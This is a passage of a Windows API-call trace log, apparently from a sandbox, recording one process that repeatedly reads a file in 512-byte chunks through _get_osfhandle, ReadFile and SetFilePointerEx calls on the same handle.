liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.137] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.137] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 
[0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.138] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.139] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, 
lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.140] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.141] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.142] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 
[0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, 
